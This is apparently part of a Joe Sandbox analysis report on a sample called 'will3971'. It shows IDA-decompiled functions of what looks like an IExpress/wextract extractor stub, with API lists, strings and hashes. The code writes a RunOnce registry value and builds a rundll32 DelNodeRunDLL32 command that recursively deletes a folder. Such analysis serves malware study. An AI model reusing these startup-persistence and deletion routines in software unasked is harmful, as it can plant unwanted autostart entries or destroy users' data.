0x002f24d4
0x002f24df
0x002f23c2
0x002f23d1
0x002f23db
0x002f23e4
0x002f23f6
0x002f23fc
0x002f2401
0x00000000
0x00000000
0x00000000
0x00000000
0x002f2407
0x002f2407
0x002f2408
0x002f2411
0x002f241f
0x002f247a
0x002f2483
0x002f2495
0x002f24a3
0x002f2421
0x002f242f
0x002f2453
0x002f245d
0x002f2466
0x002f2472
0x002f2472
0x002f242f
0x002f24af
0x002f24b5
0x002f24be
0x002f24c5
0x00000000
0x002f24c5

APIs

FindFirstFileA.KERNELBASE(?,002F8A3A,002F11F4,002F8A3A,00000000,?,?), ref: 002F23F6
lstrcmpA.KERNEL32(?,002F11F8), ref: 002F2427
lstrcmpA.KERNEL32(?,002F11FC), ref: 002F243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 002F2495
DeleteFileA.KERNEL32(?), ref: 002F24A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 002F24AF
FindClose.KERNELBASE(00000000), ref: 002F24BE
RemoveDirectoryA.KERNELBASE(002F8A3A), ref: 002F24C5

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: 11938f1ecbb52f5522b7d6fb42f5892362ff5a45145e9590a0154bd95bf24da1
Instruction ID: 0849c56e91d2a034fb271ae04dd2975dd4044bf2aebafb6f6f0cbe71698ae575
Opcode Fuzzy Hash: 11938f1ecbb52f5522b7d6fb42f5892362ff5a45145e9590a0154bd95bf24da1
Instruction Fuzzy Hash: 7D31A271214648DBC320DF64EC4DEFBB3ACAB85391F44093DA649C2190EF74992CCB52

Uniqueness

Uniqueness Score: -1.00%

Function 002F2BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E002F2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x2fa288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x2f9124 = 0;
				if(E002F2CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E002F2F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E002F52B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x2f8a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x2f9a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E002F1F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x2f8588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x2f9124; // 0x0
				return _t7;
			}

0x002f2c03
0x002f2c0d
0x002f2c18
0x002f2c20
0x002f2c2e
0x002f2c32
0x002f2c36
0x002f2c3d
0x002f2c43
0x002f2c45
0x002f2c47
0x002f2c49
0x002f2c4e
0x002f2c4e
0x002f2c47
0x002f2c32
0x002f2c20
0x002f2c50
0x002f2c54
0x002f2c57
0x002f2c64
0x002f2c66
0x002f2c6b
0x002f2c6d
0x002f2c74
0x002f2c76
0x002f2c7c
0x002f2c7e
0x002f2c87
0x002f2c89
0x002f2c89
0x002f2c87
0x002f2c7c
0x002f2c74
0x002f2c8e
0x002f2c95
0x002f2c98
0x002f2c98
0x002f2c9e
0x002f2ca7

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,002F6BB0,002F0000,00000000,00000002,0000000A), ref: 002F2C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,002F6BB0,002F0000,00000000,00000002,0000000A), ref: 002F2C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 002F2C28
CloseHandle.KERNEL32(00000000,?,?,002F6BB0,002F0000,00000000,00000002,0000000A), ref: 002F2C98

Strings

Kernel32.dll, xrefs: 002F2C13
HeapSetInformation, xrefs: 002F2C22

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: 83ac3e40845421d7added49e1a5a42046ba62da70fceae06b5bbfa4e37db979d
Instruction ID: ca11019c45de3d7b2c499df891e75c2e26adbbec1e03706e276e6d7ab2b5b16a
Opcode Fuzzy Hash: 83ac3e40845421d7added49e1a5a42046ba62da70fceae06b5bbfa4e37db979d
Instruction Fuzzy Hash: 3511917122021AEBD7106FB5BC9DF7BB75D9B863E0B060136BB08D3251DA31DC69CA61

Uniqueness

Uniqueness Score: -1.00%

Function 002F6F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E002F6F40() {

				SetUnhandledExceptionFilter(E002F6EF0); // executed
				return 0;
			}

0x002f6f45
0x002f6f4d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 002F6F45

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9e18f5d08b1c22755f1d83525e37987a4b5599c757cb53dd47c1df44a3561b6a
Instruction ID: 80a2f18924dbffb550f8e99463623205ff0ab4338023bc816e65472f3fa1871d
Opcode Fuzzy Hash: 9e18f5d08b1c22755f1d83525e37987a4b5599c757cb53dd47c1df44a3561b6a
Instruction Fuzzy Hash: C89002A52611084B97101B70AD1D836B5919A4E692F825470E119C4494DB6040509512

Uniqueness

Uniqueness Score: -1.00%

Function 002F202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E002F202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x2f8004; // 0x404cc811
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E002F6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E002F171E("wextract_cleanup3", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup3", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E002F658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x2f9a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x2f91e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x2f91e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x2f91e5);
						if(_t90 != 0) {
							 *0x2f8580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
							E002F171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup3", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E002F44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E002F658A( &_v268, 0x104, 0x2f1140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x2f8530 = _t66;
				goto L23;
			}

0x002f202a
0x002f2035
0x002f203c
0x002f2041
0x002f2050
0x002f205f
0x002f2064
0x002f206f
0x002f208c
0x002f2094
0x002f2257
0x002f2266
0x002f2266
0x002f209a
0x002f209b
0x002f209d
0x002f20aa
0x002f20af
0x002f20c9
0x002f20d1
0x00000000
0x00000000
0x002f20d3
0x002f20da
0x00000000
0x00000000
0x00000000
0x002f20da
0x002f20e2
0x002f2103
0x002f210e
0x002f2116
0x002f2122
0x002f2128
0x002f212c
0x002f2179
0x002f2194
0x002f21de
0x002f21e4
0x002f2256
0x002f2256
0x00000000
0x002f2256
0x002f2196
0x002f2196
0x002f219c
0x002f219f
0x002f219f
0x002f21a1
0x002f21a2
0x002f21a6
0x002f21a8
0x002f21b0
0x002f21b0
0x002f21b2
0x002f21b3
0x002f21bc
0x002f21c7
0x002f21cb
0x002f21f1
0x002f21f6
0x002f21fd
0x002f21ff
0x002f21ff
0x002f2204
0x002f2213
0x002f2218
0x002f221d
0x002f221d
0x002f2220
0x002f2220
0x002f2222
0x002f2223
0x002f2229
0x002f223d
0x002f2249
0x002f2250
0x00000000
0x002f2250
0x002f21d2
0x002f21d9
0x00000000
0x002f21d9
0x002f213a
0x002f2141
0x002f2144
0x002f214c
0x00000000
0x00000000
0x002f2163
0x002f2172
0x002f2172
0x00000000
0x002f2163
0x002f20ea
0x002f20f0
0x00000000

APIs

memset.MSVCRT ref: 002F2050
memset.MSVCRT ref: 002F205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 002F208C

Part of subcall function 002F171E: _vsnprintf.MSVCRT ref: 002F1750

RegQueryValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002F20C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002F20EA
GetSystemDirectoryA.KERNEL32 ref: 002F2103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002F2122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 002F2134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002F2144
GetSystemDirectoryA.KERNEL32 ref: 002F215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002F218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002F21C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002F21E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 002F223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002F2249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002F2250

Strings

%s /D:%s, xrefs: 002F21FF, 002F2210
advpack.dll, xrefs: 002F2109
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 002F21F6
DelNodeRunDLL32, xrefs: 002F212E
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 002F2082
wextract_cleanup3, xrefs: 002F20A5, 002F20BE, 002F20F0, 002F2232
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 002F21A8, 002F2204
wextract_cleanup%d, xrefs: 002F209E

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup3
API String ID: 178549006-3388056274
Opcode ID: e89a0a6c817317aa7cfa1cad16990d42dce4fd89dc42f00cf16922d087538e9d
Instruction ID: f0cb37a35a96ece251d30a0f100a8d67d2b915ce9935e5ad20f8509b6975852f
Opcode Fuzzy Hash: e89a0a6c817317aa7cfa1cad16990d42dce4fd89dc42f00cf16922d087538e9d
Instruction Fuzzy Hash: F951D2B192021DABDB209F60EC4DFFBF72CEB56790F0001B8BB49A6151DE719D69CA50

Uniqueness

Uniqueness Score: -1.00%

Function 002F55A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E002F55A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x2f8004; // 0x404cc811
				_v8 = _t28 ^ _t110;
				_t2 = E002F468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E002F468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x2f9a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x2f8b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x2f8a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E002F6517(_t82, 0x7d2, 0, E002F3210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x2f9a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x2f91e4;
									_t40 = GetTempPathA(0x104, 0x2f91e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E002F1781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E002F6952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E002F597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E002F2630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E002F658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x2f91e4;
																					E002F1781(0x2f91e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E002F5467(0x2f91e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E002F2630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E002F597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E002F5467(0x2f91e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x2f91e4;
											_t70 = E002F2630(0, 0x2f91e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x2f91e4;
												_t71 = E002F5467(0x2f91e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E002F597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x2f8b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E002F5467(0x2f8b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E002F44B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E002F44B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x2f9124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E002F44B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x2f9124 = E002F6285();
					L2:
					_t38 = 0;
				}
				L47:
				return E002F6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x002f55ab
0x002f55b2
0x002f55c9
0x002f55d5
0x002f55d9
0x002f5600
0x002f5605
0x002f560a
0x002f560c
0x002f5638
0x002f5641
0x002f5643
0x002f5645
0x002f5645
0x002f564c
0x002f5652
0x002f5657
0x002f5659
0x002f5696
0x002f569c
0x002f589f
0x002f58a7
0x002f58ac
0x002f58b3
0x002f58b5
0x002f56a2
0x002f56a2
0x002f56a8
0x00000000
0x002f56ae
0x002f56ae
0x002f56b9
0x002f56bf
0x002f56c1
0x002f56f3
0x002f56f3
0x002f5705
0x002f570a
0x002f5711
0x002f5717
0x002f5724
0x002f5726
0x002f5729
0x002f5730
0x002f5737
0x002f573d
0x002f5740
0x00000000
0x00000000
0x00000000
0x00000000
0x002f572b
0x002f572b
0x002f572e
0x002f5742
0x002f5742
0x002f5745
0x002f576b
0x002f576b
0x00000000
0x002f5747
0x002f5747
0x002f574d
0x002f574f
0x002f5771
0x002f5771
0x002f5773
0x00000000
0x002f5751
0x002f5751
0x002f5753
0x00000000
0x002f5755
0x002f575b
0x002f5760
0x002f5762
0x00000000
0x002f5764
0x002f5764
0x002f5769
0x002f577e
0x002f577e
0x002f5781
0x002f5788
0x002f578d
0x002f578f
0x002f57b2
0x002f57b8
0x002f57bd
0x002f57bf
0x002f57cd
0x002f57cd
0x002f57dd
0x002f57e3
0x002f57ef
0x002f57f5
0x002f57f8
0x002f580a
0x002f580a
0x002f57fa
0x002f5802
0x002f5802
0x002f580d
0x002f580f
0x002f5830
0x002f5836
0x002f583d
0x002f584b
0x002f5851
0x002f5855
0x002f585a
0x002f585c
0x00000000
0x002f585e
0x002f585e
0x00000000
0x002f585e
0x002f5811
0x002f5817
0x002f5819
0x002f581f
0x00000000
0x002f581f
0x002f5791
0x002f5797
0x002f579c
0x002f579e
0x00000000
0x002f57a0
0x002f57a9
0x002f57ae
0x002f57b0
0x00000000
0x00000000
0x00000000
0x00000000
0x002f57b0
0x002f579e
0x00000000
0x00000000
0x00000000
0x002f5769
0x002f5762
0x002f5753
0x002f574f
0x00000000
0x00000000
0x00000000
0x002f572e
0x00000000
0x002f5864
0x002f5864
0x002f5864
0x002f5717
0x00000000
0x002f56c3
0x002f56c5
0x002f56c9
0x002f56ce
0x002f56d0
0x00000000
0x002f56d6
0x002f56d6
0x002f56d8
0x002f56dd
0x002f56df
0x00000000
0x002f56e1
0x002f56e2
0x002f56e4
0x002f56e6
0x002f56eb
0x002f56ed
0x00000000
0x002f56f3
0x002f56f3
0x00000000
0x002f586c
0x002f5878
0x002f587e
0x002f5882
0x002f5883
0x002f5889
0x002f588e
0x002f588e
0x00000000
0x002f5896
0x002f56ed
0x002f56df
0x002f56d0
0x002f56c1
0x002f56a8
0x002f565b
0x002f565b
0x002f565d
0x002f5669
0x002f5669
0x002f565f
0x002f565f
0x002f5665
0x002f5667
0x00000000
0x00000000
0x002f5667
0x002f566c
0x002f5673
0x002f5678
0x002f567a
0x002f589b
0x002f589b
0x002f5680
0x002f5685
0x002f568c
0x00000000
0x002f568c
0x002f567a
0x002f560e
0x002f5613
0x002f561a
0x002f5620
0x002f5626
0x00000000
0x002f5626
0x002f55db
0x002f55e0
0x002f55e7
0x002f55f1
0x002f55f6
0x002f55f6
0x002f55f6
0x002f58b7
0x002f58c7

APIs

Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46A0
Part of subcall function 002F468F: SizeofResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46A9
Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46C3
Part of subcall function 002F468F: LoadResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46CC
Part of subcall function 002F468F: LockResource.KERNEL32(00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46D3
Part of subcall function 002F468F: memcpy_s.MSVCRT ref: 002F46E5
Part of subcall function 002F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 002F55CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 002F5638
LocalFree.KERNEL32(00000000), ref: 002F564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 002F5620

Part of subcall function 002F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 002F4518
Part of subcall function 002F44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 002F4554

Part of subcall function 002F6285: GetLastError.KERNEL32(002F5BBC), ref: 002F6285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 002F56B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 002F571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 002F5737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 002F57CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 002F57EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 002F5802

Part of subcall function 002F2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 002F2654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 002F5830

Part of subcall function 002F6517: FindResourceA.KERNEL32(002F0000,000007D6,00000005), ref: 002F652A
Part of subcall function 002F6517: LoadResource.KERNEL32(002F0000,00000000,?,?,002F2EE8,00000000,002F19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 002F6538
Part of subcall function 002F6517: DialogBoxIndirectParamA.USER32(002F0000,00000000,00000547,002F19E0,00000000), ref: 002F6557
Part of subcall function 002F6517: FreeResource.KERNEL32(00000000,?,?,002F2EE8,00000000,002F19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 002F6560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 002F5878

Part of subcall function 002F597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 002F59A8
